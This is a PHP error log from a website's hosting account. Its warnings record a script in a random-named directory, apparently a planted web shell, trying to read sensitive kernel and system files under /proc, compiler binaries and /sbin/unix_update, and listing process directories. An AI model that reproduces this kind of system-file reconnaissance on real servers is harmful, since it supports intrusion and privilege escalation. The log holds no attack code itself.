/home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:06:00 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:06:01 UTC] PHP Warning: scandir(//proc/2222972): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:01 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:01 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:06:01 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:06:02 UTC] PHP Warning: file_get_contents(//dev/stdout): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:29 UTC] PHP Warning: file_get_contents(//proc/kcore): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:29 UTC] PHP Warning: file_get_contents(//proc/key-users): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:30 UTC] PHP Warning: file_get_contents(//proc/sysrq-trigger): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:32 UTC] PHP Warning: file_get_contents(//bin/c ): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:32 UTC] PHP Warning: file_get_contents(//proc/misc): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:32 UTC] PHP Warning: file_get_contents(//proc/diskstats): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:32 UTC] PHP Warning: file_get_contents(//proc/vmstat): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:39 UTC] PHP Warning: file_get_contents(//proc/cgroups): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:39 UTC] PHP Warning: file_get_contents(//proc/sched_debug): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:39 UTC] PHP Warning: file_get_contents(//dev/stderr): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:39 UTC] PHP Warning: file_get_contents(//proc/kmsg): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:41 UTC] PHP Warning: scandir(//proc/2182584): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:41 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:41 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:06:41 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:06:41 UTC] PHP Warning: file_get_contents(//bin/flex ): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:41 UTC] PHP Warning: file_get_contents(//proc/vmallocinfo): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:42 UTC] PHP Warning: file_get_contents(//proc/timer_list): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:43 UTC] PHP Warning: file_get_contents(//proc/modules): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:43 UTC] PHP Warning: scandir(//proc/2211363): failed to open dir: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:43 UTC] PHP Warning: scandir(): (errno 2): No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 170 [15-Jun-2026 14:06:43 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 179 [15-Jun-2026 14:06:43 UTC] PHP Warning: Invalid argument supplied for foreach() in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 206 [15-Jun-2026 14:06:44 UTC] PHP Warning: file_get_contents(//proc/dma): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:44 UTC] PHP Warning: file_get_contents(//proc/devices): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:46 UTC] PHP Warning: file_get_contents(//proc/swaps): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:47 UTC] PHP Warning: file_get_contents(//proc/execdomains): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:48 UTC] PHP Warning: file_get_contents(//proc/keys): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:51 UTC] PHP Warning: file_get_contents(//proc/crypto): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:52 UTC] PHP Warning: file_get_contents(//bin/g ): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:52 UTC] PHP Warning: file_get_contents(//proc/fb): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:52 UTC] PHP Warning: file_get_contents(//proc/locks): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:53 UTC] PHP Warning: file_get_contents(//proc/mdstat): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:53 UTC] PHP Warning: file_get_contents(//bin/c filt): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:54 UTC] PHP Warning: file_get_contents(//proc/interrupts): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:06:59 UTC] PHP Warning: file_get_contents(//proc/softirqs): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:00 UTC] PHP Warning: file_get_contents(//proc/zoneinfo): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:02 UTC] PHP Warning: file_get_contents(//sbin/unix_update): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:03 UTC] PHP Warning: file_get_contents(//proc/schedstat): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:33 UTC] PHP Warning: file_get_contents(//proc/iomem): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:34 UTC] PHP Warning: file_get_contents(//bin/x86_64-redhat-linux-c ): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:35 UTC] PHP Warning: file_get_contents(//proc/buddyinfo): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:37 UTC] PHP Warning: file_get_contents(//bin/ld.bfd): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:39 UTC] PHP Warning: file_get_contents(//bin/ld): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:40 UTC] PHP Warning: file_get_contents(//bin/cc): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:42 UTC] PHP Warning: file_get_contents(//proc/kpageflags): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:47 UTC] PHP Warning: file_get_contents(//proc/mtrr): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:49 UTC] PHP Warning: file_get_contents(//proc/consoles): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:50 UTC] PHP Warning: file_get_contents(//bin/c99): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:54 UTC] PHP Warning: file_get_contents(//proc/kpagecount): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:54 UTC] PHP Warning: file_get_contents(//proc/partitions): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:07:57 UTC] PHP Warning: file_get_contents(//proc/kpagecgroup): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:08:01 UTC] PHP Warning: file_get_contents(//proc/slabinfo): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:08:01 UTC] PHP Warning: file_get_contents(//bin/x86_64-redhat-linux-g ): failed to open stream: No such file or directory in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:08:03 UTC] PHP Warning: file_get_contents(//bin/gcc): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:08:20 UTC] PHP Warning: file_get_contents(//proc/kallsyms): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:09:11 UTC] PHP Warning: file_get_contents(//proc/ioports): failed to open stream: Operation not permitted in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:09:22 UTC] PHP Warning: file_get_contents(//bin/c89): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:09:33 UTC] PHP Warning: file_get_contents(//bin/x86_64-redhat-linux-gcc): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:10:35 UTC] PHP Warning: file_get_contents(//bin/x86_64-redhat-linux-gcc-8): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102 [15-Jun-2026 14:10:39 UTC] PHP Warning: file_get_contents(//proc/pagetypeinfo): failed to open stream: Permission denied in /home/wirbesti/nousdecidons.ch/0fdb7/index.php on line 102
/home/wirbesti/nousdecidons.ch/472b8/../dea52/./0fdb7.tar